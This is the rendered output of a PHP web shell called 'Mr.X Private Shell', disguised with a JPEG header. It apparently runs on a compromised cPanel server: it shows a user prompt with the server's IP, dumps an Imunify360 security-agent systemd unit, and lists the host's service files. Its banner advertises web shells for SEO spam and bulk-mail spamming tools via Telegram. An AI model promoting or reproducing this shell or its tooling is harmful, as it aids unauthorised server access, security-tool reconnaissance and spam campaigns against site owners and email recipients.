����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
[Unit]
Description=Imunify360 agent
Before=cagefs.service
After=imunify360.service network.target iptables.service firewalld.service systemd-modules-load.service
Wants=imunify360.service imunify360-agent.socket imunify360-agent-user.socket
# Service will NOT start if this file exists
ConditionPathExists=!/var/lib/rpm-state/imunify360-transaction-in-progress

[Service]
CPUAccounting=true
MemoryAccounting=true
BlockIOAccounting=true
Slice=Imunify-agent_non_resident.slice
Environment=PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=upb
Environment=LANG=en_US.UTF-8
Environment=LC_ALL=en_US.UTF-8
Environment=PYTHONNOUSERSITE=1
Environment=SQLITE_TMPDIR=/var/imunify360/tmp
Environment=I360_SOCKET_ACTIVATION=1
Type=simple
ExecStartPre=/usr/share/imunify360/scripts/set-service-resources.sh imunify360-agent.service 50 50
ExecStart=/opt/imunify360/venv/bin/python3 -m im360.run
ExecStartPost=/bin/bash -c "echo $MAINPID > /var/run/imunify360-agent.pid"
ExecStartPost=/bin/systemctl restart imunify360-resource-unlock@imunify360-agent.timer
PIDFile=/var/run/imunify360-agent.pid
#TODO: must be not less than defence360agent/cli/server.py:stop(seconds=8)
TimeoutStartSec=900
TimeoutStopSec=60
RestartSec=5
StartLimitInterval=600s
StartLimitBurst=15
# Orphans child processes instead of killing them when the main process is shut down.
KillMode=process
NoNewPrivileges=true
CapabilityBoundingSet=CAP_BPF CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_KILL CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_RAW CAP_PERFMON CAP_SETGID CAP_SETUID CAP_SYS_ADMIN CAP_SYS_PTRACE CAP_SYS_RESOURCE
AmbientCapabilities=CAP_BPF CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_KILL CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_RAW CAP_PERFMON CAP_SETGID CAP_SETUID CAP_SYS_ADMIN CAP_SYS_PTRACE CAP_SYS_RESOURCE
ProtectSystem=false
# This unit ships the same Python package as imunify360.service; mirror
# its ReadWritePaths so the agent's /etc/ writers (config, integration,
# whitelist/blacklist, modsec, cron.d, repo files) keep working.
# ReadWritePaths=/etc/sysconfig/imunify360
# ReadWritePaths=/etc/imunify360
# ReadWritePaths=/etc/imunify-agent-proxy
# ReadWritePaths=/etc/cron.d
# ReadWritePaths=-/etc/imunify360-wafd
# ReadWritePaths=-/etc/imunify360-webshield
# ReadWritePaths=-/etc/csf
# ReadWritePaths=-/etc/httpd/conf.d
# ReadWritePaths=-/etc/httpd/conf/plesk.conf.d
# ReadWritePaths=-/etc/httpd/conf/extra
# ReadWritePaths=-/etc/apache2/conf.d
# ReadWritePaths=-/etc/apache2/conf-enabled
# ReadWritePaths=-/etc/apache2/plesk.conf.d
# ReadWritePaths=-/etc/modsecurity.d
# ReadWritePaths=-/etc/yum.repos.d
# ReadWritePaths=-/etc/apt/sources.list.d
# ReadWritePaths=-/usr/share/i360-php-opts
# ReadWritePaths=-/etc/httpd/conf/modsecurity.d
# ReadWritePaths=-/usr/local/directadmin
# ReadWritePaths=-/usr/local/cpanel
# ReadWritePaths=-/etc/cagefs
# ReadWritePaths=-/var/cagefs
# ReadWritePaths=-/usr/share/cagefs
# Separate top-level dir (not under /usr/share/cagefs); cagefsctl's
# check_skeleton() chmods it and hits EROFS under ProtectSystem= otherwise (DEF-47738).
# ReadWritePaths=-/usr/share/cagefs-skeleton
# ReadWritePaths=-/usr/local/psa/admin/plib/modules/imunify360
# Plesk runtime state — notification log written by send-notifications.php
# (/usr/local/psa/var/modules/imunify360/imunify360-local.log) and the
# plesk-sendmail spool/tempfile dir. ProtectSystem=true bind-mounts /usr
# read-only and CAP_DAC_OVERRIDE cannot bypass a mount-layer RO, so the
# Plesk notification hook fails with EACCES without this entry.
# ReadWritePaths=-/usr/local/psa/var
# Webuzo keeps its Apache/modsec tree under /usr/local/apps; mirror the
# carve-out (see imunify360.service) so webuzo writers are not blocked by
# read-only /usr.
# ReadWritePaths=-/usr/local/apps
# LiteSpeed keeps its config tree under /usr/local/lsws, including the
# per-domain <domain>.d/modsec.conf files the agent rewrites via
# integration.sh rewrite-domain-configs. ProtectSystem=true makes /usr
# read-only, so without this carve-out the per-domain modsec rewrite fails
# with EROFS.
# ReadWritePaths=-/usr/local/lsws
# CSF installs its post-hook script as /usr/local/csf/bin/csfpost.sh (preferred
# over /etc/csf/csfpost.sh when present); the ExportWBList plugin rewrites it
# on activation. ProtectSystem=true makes /usr read-only, so without this
# carve-out the rewrite fails with EROFS.
# ReadWritePaths=-/usr/local/csf
# PrivateTmp= deliberately not set — see imunify360.service for the
# rationale (shared /tmp is required for the Sample backup backend
# fixture and for inotify-watching user-writable /tmp on hosts).

[Install]
WantedBy=multi-user.target

Filemanager

Name Type Size Permission Actions
NetworkManager.service File 1.36 KB 0644
aibolit-resident.service File 925 B 0644
atd.service File 274 B 0644
auditd.service File 1.98 KB 0644
chronyd.service File 1.43 KB 0644
cpanel-onboot.service File 684 B 0644
cpanel.service File 716 B 0644
cpanelquotaonboot.service File 324 B 0644
cpipv6.service File 548 B 0644
crond.service File 371 B 0644
dovecot.service File 362 B 0644
ea-php82-php-fpm.service File 716 B 0644
ea-php83-php-fpm.service File 716 B 0644
exim.service File 427 B 0644
fastmail.service File 316 B 0644
httpd.service File 608 B 0644
imunify-antivirus.service File 3.75 KB 0644
imunify-auditd-log-reader.service File 443 B 0644
imunify-notifier.service File 388 B 0644
imunify360-agent.service File 4.55 KB 0644
imunify360-pam.service File 494 B 0644
imunify360-php-daemon.service File 390 B 0644
imunify360-unified-access-logger.service File 402 B 0644
imunify360-wafd.service File 475 B 0644
imunify360.service File 9.27 KB 0644
ipaliases.service File 654 B 0644
irqbalance.service File 1.04 KB 0644
jetmongod.service File 880 B 0644
kdump.service File 461 B 0644
letsencrypt-cpanel.service File 405 B 0644
mailman.service File 248 B 0644
mariadb.service File 5.73 KB 0644
nfs-client.target File 433 B 0644
nftables.service File 393 B 0644
nscd.service File 512 B 0644
pdns.service File 1.49 KB 0644
remote-fs.target File 530 B 0644
rpcbind.service File 544 B 0644
rsyslog.service File 999 B 0644
securetmp.service File 352 B 0644
smartd.service File 334 B 0644
sshd.service File 372 B 0644
sssd.service File 768 B 0644
sw-engine.service File 515 B 0644
sysstat.service File 475 B 0644
tuned.service File 439 B 0644
wp-toolkit-background-tasks.service File 341 B 0644
wp-toolkit-scheduled-tasks.service File 339 B 0644